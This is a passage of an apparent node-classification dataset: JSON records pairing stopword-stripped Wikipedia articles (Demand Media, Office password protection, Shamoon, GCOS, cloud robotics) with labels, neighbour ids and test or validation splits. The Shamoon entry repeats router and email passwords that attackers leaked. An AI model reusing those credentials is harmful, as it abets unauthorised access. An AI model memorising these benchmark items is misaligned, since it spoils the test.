billion sources close companies said yahoo executives attracted demand media ’ generation advertising impressions ability create niche social networks media sites demand media ceo richard rosenblatt later said company sale deal never got past talking stage reported rosenblatt wanted price closer 3 billion demand media august 2014 demand media acquired online art-gallery marketplace saatchi art named startup top executive sean moriarty new ceo demand media inc company changed name 2016 reflect focus marketplaces media content lifestyle platforms since 2006 demand media acquired collection relatively unknown sites relaunched social networking features video capabilities serve specific niche interests company ’ first six months made nine acquisitions including purchase major registrars enom bulkregister november 6 2008 shawn colo head demand media mergers acquisitions said company would continue buy niche well-trafficked sites company profitable still lot cash bank 2008 demand media acquired pluck company providing social networking commenting solutions websites reported 75 million cash indieclick rss graffiti acquired august 2011 name.com domain name registrar acquired january 7 2013 society6 acquired june 25 2013 saatchi online acquired august 11 2014 august 2014 demand media announced successfully separated rightside group ltd. brands enom name.com online auction site namejet result separation demand media longer provider domain name services april 2016 demand media announced sale brand cracked.com e.w scripps may 2016 demand media announced sale brand trails.com lovetoknow corp owned howard love february 2017 demand media airliners.net site acquired verticalscope majority-owned torstar 2018 leaf acquired website well+good 2018/19 leaf acquired website onlyinyourstate demand media executives say websites content-driven attract visitors showing multiword search-engine queries words typed search engine specific search called long tail search demand media attempts get visitors websites long-tail searches tries retain visitors related content social media tools social media platforms get 3 billion interactions per month clients already well-established brands demand media commissions specific website content distributes websites others advertising revenue sharing agreements demand media owned 135,000 videos 340,000 articles largest contributor youtube uploading 10,000 20,000 new videos per month gets 1.5 million page views per day youtube content generated via process demand media uses algorithms generate titles posts titles screened pool freelance writers video creators list available titles used 100,000 severely curtailed second half 2011 typically writers claim ten titles week submit articles format length dictated guidelines submitted articles go editor also freelancer either clean request rewrite writers submit revised article either accepted rejected payment via paypal twice week demand media ’ acquisition pluck.com 2008 gave means provide specialized content social media platforms website content comes advertising attached website owners get free content sites split advertising revenue demand media april 2010 financial times reported demand media planning initial public offering shares ipo would mean acquisitions would question ipo filing completed august year shares first expected offered december 2010 tender would give demand media value 1.5 billion however result securities exchange commission investigation regarding company novel accounting long-lived content pricing delayed january 12 2011 company announced would price shares 14 16 giving valuation approximately 1.3 billion questions raised demand media claim profitable given ipo filings reported losses past several years demand media attracted criticism internet watchdogs one largest buyers articles videos often commissioning low quality articles cut costs effort mass-produce articles videos appear highly google search results purchasing thousands search-engine-driven content low-paid freelancers use websites attract advertisers israeli startup owned google adsense simpli demand media also criticized methods accounting capitalizing costs content amortizing five years giving appearance profitability",
    "neighbors": [
      6696,
      8735
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11144,
    "label": 4,
    "text": "Microsoft_Office_password_protection:microsoft office password protection microsoft office password protection security feature protect microsoft office word excel powerpoint documents user-provided password office 2007 uses modern encryption earlier versions used weaker systems considered secure office 2007–2013 employed 128-bit key aes password protection remains secure office 2016 employed 256-bit key aes password protection also remains secure office 97–2003 password protection used 40-bit key rc4 contains multiple vulnerabilities rendering insecure microsoft office applications offer use two main groups passwords set document depending whether encrypt password-protected document passwords encrypt password-protected document different security level features microsoft office applications mentioned lack document encryption passwords mentioned reliably protect document hacker password cracking software remove protection password-protected document little time password encrypts document also restricts user opening document possible set type password microsoft office applications user fails enter correct password field appears attempt open password-protected document viewing editing document possible due encryption document protected password open hacker needs decrypt document get access contents provide improved security microsoft consistently enhancing office encryption algorithm strength excel word 95 prior editions weak protection algorithm used converts password 16-bit key hacking software readily available find 16-bit key decrypt password-protected document instantly excel word 97 2000 key length increased 40 bits protection algorithm also currently considered weak presents difficulties hacking software default protection office xp 2003 changed opportunity use custom protection algorithm added choosing non-standard cryptographic service provider allows increasing key length key used encrypt document ’ found however password-cracking programs enter multiple random passwords speed use csps slow password recovery weak passwords still recovered fast enough even custom csp office 2007 word excel powerpoint protection significantly enhanced since modern protection algorithm named advanced encryption standard used present software break encryption help sha-1 hash function password stretched 128-bit key 50,000 times opening document result time required crack vastly increased excel word 2010 still employ aes 128-bit key number sha-1 conversions doubled 100,000 increasing time required crack password office 2013 access excel onenote powerpoint project word uses 128-bit aes hash algorithm sha-1 default office 2016 access excel onenote powerpoint project word uses 256-bit aes sha-1 hash algorithm cbc cipher block chaining default protection worksheets macros necessarily weaker entire workbook software must able display use excel particularly weak equivalent password easily found form abababababax first 11 chars either b last ascii character number attacks employed find password remove password protection excel word documents password removal done help precomputation tables guaranteed decryption attack attacks target original password set microsoft excel word include dictionary attack rule-based attack brute-force attack mask attack statistics-based attack efficiency attacks considerably enhanced one following means applied multiple cpus distributed attack gpgpu applicable microsoft office 2007–2010 documents cloud computing due weak passwords moment cloud computing facilities capable unlocking many ca 80 files saved office 2007–2010 format passwords sufficient length complexity typically brute-forced office 2013 introduces sha-512 hashes encryption algorithm making brute-force rainbow table attacks slower however noted sha hash algorithms never designed password hashing thus considered secure anymore modern slower thus secure hashes pbkdf2 scrypt kdfs yet implemented office specialized software designed recover lost microsoft office passwords pre-aes encryption ultimately security password-protected document dependent user choosing password sufficient complexity password determined guesswork social engineering underlying cipher important",
    "neighbors": [
      4194,
      7523,
      6916,
      7556,
      7557,
      2632,
      8040,
      460,
      3629,
      10029,
      1904,
      3984,
      9328,
      5619,
      440,
      2046
    ],
    "mask": "Test"
  },
  {
    "node_id": 11145,
    "label": 2,
    "text": "MOS_(operating_system):mos operating system mos signifies 'mobile operating system soviet clone unix 1980s operating system commonly found sm evm minicomputers also ported es evm elbrus mos also used high-end pdp-11 clones several modifications mos named mnos demos etc",
    "neighbors": [
      6787,
      8713,
      3722,
      6412,
      7823,
      5267,
      5397,
      1304,
      3487,
      3241,
      10156,
      7983,
      3248,
      2995,
      9141,
      823,
      7224,
      3129,
      9784,
      1853,
      9151,
      10436,
      4039,
      6369,
      4076,
      5492,
      2424,
      633
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11146,
    "label": 4,
    "text": "Secureworks:secureworks secureworks inc. united states-based subsidiary provides information security services protecting customers computers networks information assets malicious activity cybercrime company approximately 4,400 customers across 61 countries ranging fortune 100 companies mid-sized businesses variety industries became part dell february 2011 branched become public organization april 2016 still majority-owned dell secureworks founded privately held company 1998 michael pearson joan wilbanks 2002 michael r. cote became president ceo 2005 2006 company named inc. 500 inc. 5000 lists 2006 deloitte ’ fast 500 2006 secureworks merged lurhq corporation new entity continued secureworks corporate name lurhq founded 1996 myrtle beach sc provided managed security services large enterprises similar company cultures leadership secureworks according gartner merger created stronger company merger secureworks able leverage sherlock lurhq portal unify combined customer base onto single integrated security management platform 2009 secureworks acquired managed security services mss business verisign inc. provider internet infrastructure services networked world grew 500 employees worldwide acquisition expanded clients approximately 2,600 50 countries including united kingdom saudi arabia taiwan finland spain brazil mexico includes four fortune 10 also 2009 secureworks acquired 10-year-old dns limited acquisition expanded secureworks operation include uk-based operations center additional offices london edinburgh january 4 2011 dell announced would acquire secureworks part dell services dell secureworks officially began operating dell subsidiary february 7 2011 dell secureworks continued expand portfolio around world may 2013 arrived anz region move australia new zealand put dell ring security services market companies like ibm hp verizon dell secureworks opened operations center sydney meet demands local australia businesses demand services area penetration testing forensic investigations ongoing monitoring environments attacks december 17 2015 dell subsidiary secureworks filed go public april 22 2016 secureworks announced ipo raising 112 million pricing ipo 14 per share however company expecting initial price 15.50- 17.50 first tech ipo u.s. 2016 august 2017 secureworks rebranded logo changed capitalization w name lower case",
    "neighbors": [
      2976,
      8288,
      8515,
      6153,
      11146,
      4945,
      7089,
      54,
      7126,
      1400,
      8022,
      9630,
      10615
    ],
    "mask": "Test"
  },
  {
    "node_id": 11147,
    "label": 2,
    "text": "List_of_Unix_daemons:list unix daemons list unix daemons found various unix-like operating systems unix daemons typically name ending",
    "neighbors": [
      225,
      6273,
      9762,
      7364,
      3750,
      10727,
      8360,
      1801,
      10344,
      5840,
      11539,
      2996,
      5397,
      9909,
      11292,
      4797,
      5471
    ],
    "mask": "Test"
  },
  {
    "node_id": 11148,
    "label": 3,
    "text": "Comic_Bakery:comic bakery comic bakery computer game msx made konami 1984 later ported commodore 64 imagine software game set bakery town baker tries bake deliver bread croissants msx version fighting raccoons pieces bread move along factory line raccoons try eat bread switch machines player required keep machinery running also scare away raccoons player succeeds delivery truck loaded bread drives advancing player next level level maintains format last difficulty increasing player progresses levels music sound effects c64 version made martin galway title chiptune covered press play tape visa röster instant remedy msx version unique music using yankee doodle instead song comic bakery also used games jurassic park game boy color platypus pc",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 11149,
    "label": 2,
    "text": "Unicode_in_Microsoft_Windows:unicode microsoft windows microsoft one first companies implement unicode back ucs-2 evolved utf-16 products still 2019 improving operating system support utf-8 windows nt first operating system used wide characters system calls using ucs-2 encoding scheme first upgraded utf-16 starting windows 2000 allowing representation additional planes surrogate pairs current windows versions back windows xp prior windows nt 3.x 4.0 shipped system libraries support string encoding two types 16-bit unicode utf-16 since windows 2000 sometimes multibyte encoding called code page incorrectly referred ansi code page 16-bit functions names suffixed -w wide codice_1 code page oriented functions use suffix -a ansi codice_2 conventions used apis copied systems codice_3 codice_4 split necessary many languages including c provide clean way pass 8-bit 16-bit strings function functions implemented wrapper translates text using current code page utf-16 calls w function functions return strings opposite conversion apparently put characters n't exist current locale microsoft attempted support unicode portably providing unicode switch compiler switches unsuffixed generic calls w interface converts string constants wide utf-16 versions actually work translate utf-8 outside string constants resulting code attempts open files compiling earlier independent unicode switch windows also provides mbcs api switch changes functions n't work mbcs codice_5 mbcs-aware one codice_6 notice lot microsoft documentation uses term unicode mean 8-bit text windows ce utf-16 used almost exclusively api mostly missing limited set ansi api available windows ce 5.0 use reduced set locales may selectively built onto runtime image 2001 microsoft released special supplement microsoft ’ old windows 9x systems includes dynamic link library unicows.dll 240 kb containing 16-bit flavor ones letter w end basic functions windows api microsoft windows code page designated utf-8 code page 65001 prior windows 10 insider build 17035 november 2017 impossible set locale code page 65001 leaving code page available microsoft claimed utf-8 locale might break functions possible example _mbsrev written assume multibyte encodings used 2 bytes per character thus code pages bytes gb 18030 cp54936 utf-8 could set locale means narrow functions particular codice_8 opens files called utf-8 strings fact way open possible files using codice_8 matter locale set and/or bytes put string none available locales produce possible utf-16 characters problem also applies api takes returns 8 bit strings including windows ones codice_10 modern non-windows platforms string passed codice_8 effectively utf-8 produces incompatibility platforms windows normal work-around add windows-specific code convert utf-8 utf-16 using multibytetowidechar call wide function another popular work-around convert name 8.3 filename equivalent necessary codice_8 inside library function takes string filename altered proposals add new apis portable libraries boost necessary conversion adding new functions opening renaming files functions would pass filenames unchanged unix translate utf-16 windows would allow code portable required many code changes calling wide functions insider build 17035 april 2018 update nominal build 17134 windows 10 beta use unicode utf-8 worldwide language support checkbox appeared setting locale code page utf-8 allows calling narrow functions including codice_8 codice_2 utf-8 strings microsoft compilers often fail producing utf-8 string constants utf-8 source files reliable method turn unicode mark input file utf-8 i.e use bom arrange string constants utf-8 bytes bom added microsoft compiler interpret strings utf-8 convert utf-16 convert back current locale thus destroying utf-8 without bom using single-byte locale microsoft compilers leave bytes quoted string unchanged",
    "neighbors": [
      3840,
      321,
      9840,
      8976,
      5754
    ],
    "mask": "None"
  },
  {
    "node_id": 11150,
    "label": 9,
    "text": "FXScript:fxscript fxscript scripting language final cut pro final cut express fxbuilder scripting utility users able modify existing fcp fxscripts program completely new ones example scale image two lines necessary scale image full size half size first region might rectangle scaled statement scale parameters statement blitrect copies region image changed region origregion new region different sizes final cut pro scales image fit new region statement command accomplishes single action example statements scale blitrect fxbuilder users create test fxscripts optionally multiple windows inside final cut pro/express fxscript three types effects fxscript two parts normally flow script top bottom users take flow control using loops example for/next conditional branches example if/else fxscript also allows breaking scripts subroutines called parts script using names",
    "neighbors": [
      9780
    ],
    "mask": "Test"
  },
  {
    "node_id": 11151,
    "label": 3,
    "text": "MSX_character_set:msx character set msx character sets group single- double-byte character sets developed microsoft msx computers based code page 437 since graphic characters corresponding unicode representation portably displayed web browser following table shows msx characters corresponding unicode glyph code point otherwise unicode replacement character u+fffd � hyphen code point control characters non-printing characters represented names character set differences exist depending target market machine variations german din international character sets identical apart style zero 0 character international character set zero slash din character set dotted zero msx terminal compatible vt-52 escape codes plus extra control codes shown brazilian manufacturer gradiente initially included modified msx character set v1.0 machines allow writing correct portuguese differences shown boxed symbol 0x9e 158 currency symbol brazilian cruzado used anymore later brazilian msx models v1.1 higher included standardized character set named brascii solved accentuation incompatibility problems amongst different makers",
    "neighbors": [
      5384,
      3563,
      9006,
      7504,
      3443,
      3708,
      2078
    ],
    "mask": "Test"
  },
  {
    "node_id": 11152,
    "label": 4,
    "text": "Shamoon:shamoon shamoon also known w32.distrack modular computer virus discovered 2012 targeting recent 32-bit nt kernel versions microsoft windows virus noted behavior differing malware attacks due destructive nature cost attack recovery known years later biggest hack history virus apparently intended cyber warfare shamoon spread infected machine computers network system infected virus continues compile list files specific locations system upload attacker erase finally virus overwrites master boot record infected computer making unusable virus used cyber warfare national oil companies saudi arabia saudi aramco qatar rasgas discovery announced 16 august 2012 symantec kaspersky lab seculert similarities highlighted kaspersky lab seculert shamoon flame malware malware unique used target saudi government causing destruction state owned national oil company saudi aramco attackers posted pastie pastebin.com hours prior wiper logic bomb occurring citing oppression al-saud regime reason behind attack attack well-staged according chris kubecka former security advisor saudi aramco attack group leader security aramco overseas unnamed saudi aramco employee information technology team opened malicious phishing email allowing initial entry computer network around mid-2012 kubecka also detailed black hat usa talk saudi aramco placed majority security budget ics control network leaving business network risk major incident behalf anti-oppression hacker group fed crimes atrocities taking place various countries around world especially neighboring countries syria bahrain yemen lebanon egypt ... also dual approach world community nations want hit main supporters disasters action one main supporters disasters al-saud corrupt regime sponsors oppressive measures using muslims oil resources al-saud partner committing crimes hands infected blood innocent children people first step action performed aramco company largest financial source al-saud regime step penetrated system aramco company using hacked systems several countries sended malicious virus destroy thirty thousand computers networked company destruction operations began wednesday aug 15 2012 11:08 local time saudi arabia completed within hours shamoon attack designed two things replace data hard drives image burning american flag report addresses infected computers back computer inside company ’ network virus consisted three components dropper wiper reporter dropper main component source infection component drops wiper reporter onto infected computer copies network shares executes creates service start whenever windows starts wiper destructive component component gathers files locations infected computers erases sends information files attacker erased files overwritten corrupted files recovered reporter component sends infected information back attacker 15 august 11:08 local time 30,000 windows based systems began overwritten symantec found affected systems image american flag whilst data deleted overwritten saudi aramco announced attack facebook page went offline company statement issued 25 august 2012 statement falsely reported normal business resumed 25 august 2012 however middle eastern journalist leaked photographs taken 1 september 2012 showing kilometers petrol trucks unable loaded due backed business systems still inoperable saudi aramco restored main internal network services impacted august 15 2012 malicious virus originated external sources affected 30,000 workstations workstations since cleaned restored service precaution remote internet access online resources restricted saudi aramco employees returned work august 25 2012 following eid holidays resuming normal business company confirmed primary enterprise systems hydrocarbon exploration production unaffected operate isolated network systems production plants also fully operational control systems also isolated august 29 2012 attackers behind shamoon posted another pastie pastebin.com taunting saudi aramco proof still retained access company network post contained username password security network equipment new password aramco ceo khalid al-falih attackers also referenced portion shamoon malware proof pastie internet service routers three info follows core router sa-ar-co-1 password telnet c1sc0p ss-ar-cr-tl enable c1sc0p ss-ar-cr-bl backup router sa-ar-co-3 password telnet c1sc0p ss-ar-bk-tl enable c1sc0p ss-ar-bk-bl middle router sa-ar-co-2 password telnet c1sc0p ss-ar-st-tl enable c1sc0p ss-ar-st-bl khalid a. al-falih ceo email info follows khalid.falih aramco.com password kal ram sa1960 security appliances used according kubecka order restore operations saudi aramco used large private fleet aircraft available funds purchase much world hard drives driving price new hard drives required quickly possible oil prices affected speculation september 1 2012 gasoline resources dwindling public saudi arabia 17 days august 15th attack rasgas also affected different variant crippling similar manner unclear attacker may interest actually destroying infected pc kaspersky labs hinted 900 kb malware could related wiper used cyber attack iran april 2-day analysis company erroneously concluded malware likely come scriptkiddies inspired wiper later blog post eugene kaspersky clarified use shamoon categorizing cyber warfare virus hit companies within oil energy sectors group named cutting sword justice claimed responsibility attack 35,000 saudi aramco workstations causing company spend week restoring services group later indicated shamoon virus used attack computer systems rasgas also knocked offline unidentified computer virus security experts attributing damage shamoon shamoon made surprise comeback november 2016 according symantec involved new attack 23 january 2017 malware logic bomb triggered master boot record data wiping payload 11:08am local time wednesday august 15 attack occurred month ramadan 2012 would appear attack timed occur staff gone holiday reducing chance discovery maximum damage could caused hampering recovery shamoon uses number components infect computers first component dropper creates service name ‘ ntssrv ’ remain persistent infected computer spreads across local network copying computers drop additional components infected computers dropper comes 32-bit 64-bit versions 32-bit dropper detects 64-bit architecture drop 64-bit version malware also contains disk wiping component utilizes eldos-produced driver known rawdisk achieve direct user-mode access hard drive without using windows apis component overwrites files portions image 2012 attack used image burning u.s. flag 2016 attack used photo body alan kurdi",
    "neighbors": [
      1024,
      5636,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      3116,
      7739,
      1608,
      3657,
      8779,
      4703,
      8288,
      8292,
      5754,
      10875,
      3711,
      8320,
      7809,
      5764,
      2187,
      6797,
      4240,
      1688,
      3225,
      2717,
      9375,
      3235,
      7855,
      9904,
      9395,
      8886,
      9932,
      3789,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      1801,
      10003,
      3867,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      6484,
      857,
      1882,
      7515,
      9569,
      3956,
      9082,
      10110,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      4054,
      7639,
      8664,
      9688,
      1504,
      9186,
      2542,
      4081,
      507
    ],
    "mask": "Test"
  },
  {
    "node_id": 11153,
    "label": 2,
    "text": "General_Comprehensive_Operating_System:general comprehensive operating system general comprehensive operating system gcos originally gecos general electric comprehensive operating supervisor family operating systems oriented toward 36-bit ge/honeywell mainframe computers original version gcos developed general electric 1962 operating system still used today recent versions gcos 7 gcos 8 servers mainframes produced groupe bull primarily emulation provide continuity legacy mainframe environments note gcos 7 gcos 8 separate branches operating system continue developed alongside gecos-ii operating system developed general electric 36-bit ge-635 1962-1964 bore close resemblance architecturally ibsys ibm 7094 less dos/360 system/360 however ge-635 architecture different ibm system/360 gecos ambitious dos/360 gecos-ii supported time-sharing tss batch processing dynamic allocation memory ibm fixed partitions time making true second-generation operating system honeywell acquired ge computer division gecos-iii renamed gcos 3 heart 24-bits ge-400 series hardware line renamed h-6000 adding eis enhanced instruction set character oriented instead word oriented later honeywell marketing created series 60 renamed h-6000 level 66 later dps 8 honeywell along european affiliate cii-honeywell bull launched new 32-bit product line called level 64 later became dps 7 name gcos extended operating systems honeywell-marketed product lines gcos-64 completely different 32-bit operating system level 64 series similar parallel development called multics designed honeywell honeywell bull developers france boston gcos-62 operating system another 32-bit low-end line machines level 62 series designed italy gcos-61 operating system new version small system made france model 58 later level 61/58 operating system new 16-bit minicomputer line massachusetts billerica level 6 got name gcos 6 another renaming hardware product lines occurred 1979 level 6 becoming dps 6 level 62 becoming dps 4 level 64 becoming dps 7 level 66 becoming dps 8 operating systems retained gcos brand-name gcos 6 gcos 4 gcos 7 gcos 8 introduced gcos 8 extensive rewrite gcos 3 changes made support true virtual memory management demand paging changes also required new hardware gcos 3 supported maintenance several years announcement renaming gcos 3 later gcos 7 gcos 8 featured good codasyl relational database called integrated data store ids model successful idms several transaction processing monitors designed gcos 3 gcos 8 early attempt tp gcos 3 transaction processing executive assumed unix new process started handle transaction enjoyed limited success another tp system transaction driven system tds soon developed gcos 3 using single process potentially multiple threads service transactions tds essentially honeywell development later replaced backward-compatible transaction processing 8 tp8 gcos 8 profited overhaul gcos system architecture came gcos 8 make full use virtual memory concepts tp8 used multiple static processes way similar unix daemons handle incoming transactions multiplexed way tds tp8 successor commercially successful tds predated ibm cics similar architecture similar product also called tds developed gcos-7 internal architecture completely different dps 6 dps 4 ex-level 62 superseded motorola 68000- later powerpc minicomputers running unix product lines discontinued though gcos 6 ran emulator top aix dps 7 line along gcos 7 continued evolve dps 7000 hardware base late 1980s honeywell sold computer business joint venture initially included nec bull honeywell still holding stake time couple years bull took company nec supplied several generations mainframe hardware high end would run gcos 8 acos-4 operating system bull used nomenclature dps-9000 entire gcos 8-based mainframe line included models designed bull nec late 1990s early 2000s bull desire center development single hardware base running commodity intel chips bull value-adds platform called novascale based itanium 2 processors runs windows linux natively however instruction set simulators dps 7000 dps 9000 allowed gcos 7 gcos 8 run platform gcos 7 also ported lower-end xeon-based platform bull publicly stated gcos 8 continue developed itanium systems bull continues invest development money support gcos 7 gcos 8 still customers countries around world support gcos 7 gcos 8 bull planned least 2025 including regular hardware software upgrades trace gcos influence remains today modern unix systems early unix systems bell labs used gcos machines print spooling various services field added /etc/passwd carry gcos id information called gecos field survives today pw_gecos member used user full name human-id information due historically important far-reaching influence gcos sometimes known king operating systems gcos multithreading multiprogramming operating system originally oriented towards batch processing although later versions incorporated enhancements timesharing online transaction processing environments systems running gcos today use mainly batch oltp backend enterprise server although gcos basic architecture similar ibm 360 earlier ibm 7090 series abandoned ibm 360 subsequent operating systems competed also heavily influenced projects medinet multics wwmccs inherited strong security structure consequence hardware software features combine render operating system unusually secure operating system generation class multics influenced design hardware gate-oriented secure transfer-of-control instructions hardware-enforced system security levels similar famous multics rings operational environments wwmccs drove development special security features allow secure hosting classified information compartmentalization time separate versions gcos system special security features turned maintained specifically government customers gcos process-oriented os process hosts one execution threads executes virtual memory space virtual memory divided segments arbitrary size reminiscent multics segments second level address translation converts pure virtual addresses pageable addresses converted real addresses main memory backing store segments pages constructs include hardware-enforced security parameters top-level virtual memory architecture also simplifies sharing code data secure fashion way reminiscent multics gcos requires specific hardware designed operating system although recent machines capable running os emulation hardware originally much common multics hardware much mainframe equipment could switched gcos mode multics mode turn dial much peripheral equipment used gcos shared great deal multics although front-end network processors different two systems program languages available gcos included gcos algol algol-68 cobol snobol jovial apl fortran 68 coral 66 fortran 77 b become accustomed almost universal terminology units storage modern terminology applies across various operating systems computer vendors part everyday conversation terms like megabyte gigabyte mean much everyone terms like mebibyte gibibyte formally standardised however gcos8 system pre-dates mono-culture colourful units follows note system byte contains 9 bits values ranging 000 777 0–511 unlike usual 8-bit-bytes values ranging 00 ff 0-255 due 36-bit cpu architecture permanent file sizes specified llinks 1280 bytes temporary file sizes specified links 15,360 bytes since early 1970s gcos 3 gcos 8 disk drives used logical block addressing lba",
    "neighbors": [
      2179,
      10508,
      6797,
      5523,
      6675,
      5397,
      5658,
      2211,
      7983,
      823,
      10040,
      2625,
      11075,
      4423,
      8136,
      5065,
      8137,
      1611,
      3916,
      10569,
      2519,
      9436,
      3429,
      7269,
      3816,
      10089,
      623,
      5492,
      6772,
      3323,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 11154,
    "label": 9,
    "text": "Server_Side_Includes:server side includes server side includes ssi simple interpreted server-side scripting language used almost exclusively web useful including contents one files web page web server using codice_1 directive could commonly common piece code throughout site page header page footer navigation menu ssi also contains control directives conditional features directives calling external programs supported apache litespeed nginx iis well w3c jigsaw roots ncsa httpd order web server recognize ssi-enabled html file therefore carry instructions either filename end special extension default codice_2 codice_3 codice_4 server configured allow set execution bit file simple programming language ssi supports one type text control flow rather simple choice supported loops natively supported done recursion using include using http redirect simple design language makes easier learn use server-side scripting languages complicated server-side processing often done one feature-rich programming languages ssi turing complete ssi simple syntax codice_5 directives placed html comments ssi enabled users see ssi directives page unless look source note syntax allow spaces leading directive apache tutorial ssi stipulates format requires space character -- closes element web page containing daily quotation could include quotation placing following code file web page one change codice_6 file pages include file display latest daily quotation inclusion limited files may also text output program value system variable current time following ssi directives times ncsa httpd 1990s supported implementations control directives later added ssi include ubiquitous if-elif-else-endif flow control variable writing well exotic features like loops found implementations",
    "neighbors": [
      4485,
      1802,
      1803,
      10506,
      9229,
      1556,
      5012,
      7965,
      8350,
      11167,
      7457,
      10145,
      10020,
      3237,
      7847,
      7338,
      9387,
      7212,
      10026,
      10284,
      4658,
      2485,
      1468,
      4797,
      10622,
      8644,
      1223,
      10953,
      11466,
      3920,
      4439,
      5593,
      5849,
      6366,
      225,
      865,
      4837,
      7784,
      9834,
      9580,
      8689,
      9841,
      119,
      124,
      9726
    ],
    "mask": "None"
  },
  {
    "node_id": 11155,
    "label": 2,
    "text": "The_Code_(2001_film):code 2001 film code english-language finnish documentary linux 2001 featuring influential people free software movement free open-source advocates programmers film",
    "neighbors": [
      2560,
      5644,
      5139,
      9237,
      10780,
      4637,
      3618,
      9257,
      1584,
      9266,
      10817,
      8772,
      2134,
      3162,
      2658,
      6244,
      6763,
      11391,
      7812,
      8326,
      10382,
      657,
      2195,
      6808,
      9882,
      6301,
      1694,
      10933,
      4803,
      6352,
      3289,
      3802,
      10464,
      1761,
      4841,
      7920,
      7938,
      4360,
      1813,
      7450,
      5410,
      1833,
      815,
      5430,
      823,
      6968,
      3395,
      3911,
      10063,
      4437,
      11095,
      3422,
      863,
      2914,
      10091,
      6508,
      7020,
      1394,
      1396,
      1406,
      3458,
      7555,
      11654,
      4493,
      10127,
      1431,
      9637,
      935,
      4011,
      9646,
      1456,
      9660,
      10687,
      4040,
      457,
      5067,
      8147,
      472,
      9696,
      11232,
      1506,
      8676,
      2021,
      9190,
      10732,
      1524,
      2036,
      5620
    ],
    "mask": "None"
  },
  {
    "node_id": 11156,
    "label": 7,
    "text": "Cloud_robotics:cloud robotics cloud robotics field robotics attempts invoke cloud technologies cloud computing cloud storage internet technologies centred benefits converged infrastructure shared services robotics connected cloud robots benefit powerful computation storage communication resources modern data center cloud process share information various robots agent machines smart objects humans etc. humans also delegate tasks robots remotely networks cloud computing technologies enable robot systems endowed powerful capability whilst reducing costs cloud technologies thus possible build lightweight low cost smarter robots intelligent brain cloud brain consists data center knowledge base task planners deep learning information processing environment models communication support etc cloud robots potentially least six significant components funded european union seventh framework programme research technological development projects specifically explore field cloud robotics goal roboearth allow robotic systems benefit experience robots paving way rapid advances machine cognition behaviour ultimately subtle sophisticated human-machine interaction roboearth offers cloud robotics infrastructure roboearth ’ world-wide-web style database stores knowledge generated humans – robots – machine-readable format data stored roboearth knowledge base include software components maps navigation e.g. object locations world models task knowledge e.g. action recipes manipulation strategies object recognition models e.g. images object models roboearth cloud engine includes support mobile robots autonomous vehicles drones require lots computation navigation rapyuta open source cloud robotics framework based roboearth engine developed robotics researcher ethz within framework robot connected rapyuta secured computing environment rectangular boxes giving ability move heavy computation cloud addition computing environments tightly interconnected high bandwidth connection roboearth knowledge repository myrobots service connecting robots intelligent devices internet regarded social network robots smart objects i.e facebook robots socialising collaborating sharing robots benefit interactions sharing sensor information giving insight perspective current state ros robot operating system provides eco-system support cloud robotics ros flexible distributed framework robot software development collection tools libraries conventions aim simplify task creating complex robust robot behaviour across wide variety robotic platforms library ros pure java implementation called rosjava allows android applications developed robots since android booming market billion users would significant field cloud robotics davinci project proposed software framework seeks explore possibilities parallelizing robotics algorithms map/reduce tasks hadoop project aims build cloud computing environment capable providing compute cluster built commodity hardware exposing suite robotic algorithms saas share data co-operatively across robotic ecosystem initiative available publicly c2ro c2ro cloud robotics platform processes real-time applications collision avoidance object recognition cloud previously high latency times prevented applications processed cloud thus requiring on-system computational hardware e.g graphics processing unit gpu c2ro published peer-reviewed paper ieee pimrc17 showing platform could make autonomous navigation ai services available robots- even limited computational hardware e.g raspberry pi cloud c2ro eventually claimed first platform demonstrate cloud-based slam simultaneous localization mapping robobusiness september 2017 noos cloud robotics service providing centralised intelligence robots connected service went live december 2017 using noos-api developers could access services computer vision deep learning slam noos developed maintained ortelio ltd. rocos centralized cloud robotics platform provides developer tooling infrastructure build test deploy operate automate robot fleets scale founded october 2017 platform went live january 2019 though robots benefit various advantages cloud computing cloud solution robotics research development cloud robotics following potential issues challenges term cloud robotics first appeared public lexicon part talk given james kuffner 2010 ieee/ras international conference humanoid robotics entitled cloud-enabled robots early days robot development common computation done computer separated actual robot mechanism connected wires power control wireless communication technology developed new forms experimental remote brain robots developed controlled small onboard compute resources robot control safety wirelessly connected powerful remote computer heavy processing term cloud computing popularized launch amazon ec2 2006 marked availability high-capacity networks low-cost computers storage devices well widespread adoption hardware virtualization service-oriented architecture correspondence popular science july 2006 kuffner wrote robot programmed successfully learned perform task could share model relevant data cloud-connected robots publications events related cloud robotics chronological order",
    "neighbors": [
      2818,
      4194,
      4964,
      5956,
      4107,
      3412,
      7802,
      8446
    ],
    "mask": "None"
  },
  {
    "node_id": 11157,
    "label": 4,
    "text": "Disaster_recovery_and_business_continuity_auditing:disaster recovery business continuity auditing given organizations increasing dependency information technology run operations business continuity planning covers entire organization disaster recovery focuses auditing documents covering organization business continuity disaster recovery plans provides third-party validation stakeholders documentation complete contain material misrepresentations lack completeness result overlooking secondary effects vastly increased work-at-home overloads incoming recovery site telecommunications capacity bi-weekly payroll critical within first 48 hours causing perceived problems ever recovering complicated governmental possibly union reaction often used together terms business continuity disaster recovery different business continuity refers ability business continue critical functions business processes occurrence disaster whereas disaster recovery refers specifically information technology data-centric functions business subset business continuity primary objective protect organization event part operations and/or computer services rendered partially completely unusable minimizing downtime data loss disaster recovery measured terms two concepts auditor examines assess maximize effectiveness disaster recovery plans effective updated frequently adequate records need retained organization auditor examines records billings contracts verify records kept one record current list organization hardware software vendors list made periodically updated reflect changing business practice copies stored site made available accessible require auditor tests procedures used meet objective determine effectiveness disaster recovery plan drp documented process set procedures execute organization disaster recovery processes recover protect business infrastructure event disaster comprehensive statement consistent actions taken disaster disaster could natural environmental man-made man-made disasters could intentional example act terrorist unintentional accidental breakage man-made dam although one-size-fits-all plan three basic strategies latter may include securing proper insurance policies holding lessons learned brainstorming session business continuity plan bcp comprehensive organizational plan includes disaster recovery plan consists five component plans first three business resumption occupant emergency continuity operations plans deal infrastructure incident management plan imp deal infrastructure since establishes structure procedures address cyber attacks organization ’ systems generally represent agent activating disaster recovery plan 